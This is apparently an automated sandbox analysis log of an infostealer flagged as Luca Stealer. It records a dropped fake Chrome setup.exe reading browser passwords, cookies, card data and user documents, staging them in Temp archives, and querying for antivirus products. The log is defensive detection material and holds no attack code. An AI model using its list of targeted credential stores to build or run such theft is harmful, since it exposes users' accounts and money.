            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.CertificateServices.PKIClient.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.CertificateServices.PKIClient.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.CertificateServices.PKIClient.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.CertificateServices.PKIClient.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.CertificateServices.PKIClient.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.CertificateServices.PKIClient.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\bb.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\Excel 2016.lnk VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.jpg VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.mp3 VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\Microsoft Edge.lnk VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\NHPKIZUUSG.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\TQDGENUHWP.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\TQDGENUHWP.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\TQDGENUHWP.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\TQDGENUHWP.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\Word 2016.lnk VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.jpg VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.jpg VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AIXACVYBSB.mp3 VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AIXACVYBSB.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AIXACVYBSB.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AIXACVYBSB.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\AIXACVYBSB.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.jpg VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.mp3 VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\MNULNCRIYC.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\MNULNCRIYC.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\NHPKIZUUSG.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\TQDGENUHWP.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\TQDGENUHWP.docx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\TQDGENUHWP.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\TQDGENUHWP.pdf VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\VLZDGUKUTZ.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\XZXHAVGRAG.jpg VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW.mp3 VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\ZSSZYEFYMU.jpg VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\ZSSZYEFYMU.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\Documents\ZSSZYEFYMU.xlsx VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\Autofill VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\Cookies VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\Creditcards VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\Passwords VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\screen1.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\screen1.png VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\sensfiles.zip VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\sensfiles.zip VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\user_info.txt VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\user_info.txt VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\Passwords\googledefault VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\Creditcards\googledefault VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\Autofill\googledefault VolumeInformationJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\user\Desktop\bb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00E70E62 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00E70E62
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00C97620 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,4_2_00C97620
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Luca Stealer
            Source: Yara matchFile source: 12.0.setup.exe.7ff610e90000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.setup.exe.7ff610e90000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000000.275348795.00007FF611186000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.304112093.00007FF611186000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Program Files\Google LLC\Google Chrome\setup.exe, type: DROPPED
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13305162904584360\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigrated\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\02d1844e-21ba-4692-9e00-6c34d58ed22d\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Media History-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001\Login DataJump to behavior
